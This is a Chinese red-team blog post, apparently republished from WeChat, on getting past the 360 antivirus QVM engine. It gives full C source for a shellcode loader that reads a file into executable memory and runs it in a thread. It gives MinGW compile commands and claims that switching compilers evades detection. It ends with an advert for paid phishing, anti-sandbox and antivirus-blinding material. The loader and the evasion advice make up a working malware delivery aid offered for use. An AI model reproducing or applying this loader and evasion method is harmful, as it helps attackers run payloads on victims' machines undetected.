【免杀思路】如何快速解决QVM!(篇一)中提到的方法目的是为了让360不认识我们的程序而且程序看起来正常!那有没有更加简易的方法呢?答案是肯定的,聪明的师傅应该也从标题中发现了。
VC6
voidTest(LPCSTR name){HANDLE bin = CreateFileA(name, GENERIC_READ, 0, NULL, OPEN_ALWAYS, 0, NULL); //打开要执行的ShellCode文件if (bin == INVALID_HANDLE_VALUE){return;}DWORD dwSize = 0;dwSize = GetFileSize(bin, NULL); //检索指定文件的大小LPVOID lpAddress = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); //申请内存if (lpAddress == NULL){return;}DWORD dwRead = 0;ReadFile(bin, lpAddress, dwSize, &dwRead, 0); //将文件读取到申请的内存中HANDLE go = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lpAddress, NULL, 0, NULL); //创建线程WaitForSingleObject(go, INFINITE); //一直等待线程执行完再继续往下走return;}intmain(int argc, char* argv[]){Test(argv[1]);return 0;}
mingw32
X86编译命令:gcc.exe D:mingw32testhell.c -o D:mingw32testh.exeX64编译命令:gcc.exe D:mingw32testhell.c -o D:mingw32testh.exe -m64
QVM对VS爱的有点过啊。主要原因还是VS编写的loader太多了,QVM特征一堆,换个编译器,可以说是脱胎换骨,QVM不认识我们的程序,那不就过了。
0x05 红蓝偶像练习生小圈子
-
红队场景下lnk钓鱼Bypass国内AV -
红队场景下可用反沙箱 -
HeavenlyBypassAV内部版 -
HeavenlyProtectionCS内部CS插件 -
LNK钓鱼图标自适应制作 -
Fscan免杀核晶思路 -
Kill360核晶思路 -
红队思路-钓鱼环境下小窗口截屏窃取 -
AV对抗思路-致盲AV思路(核晶) -
lnk钓鱼思路视频讲解 -
QVM解决思路 -
还有更多红队资源文章!期待您的加入!!!
原文始发于微信公众号(安全天书):【免杀思路】如何快速解决QVM!(篇二)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论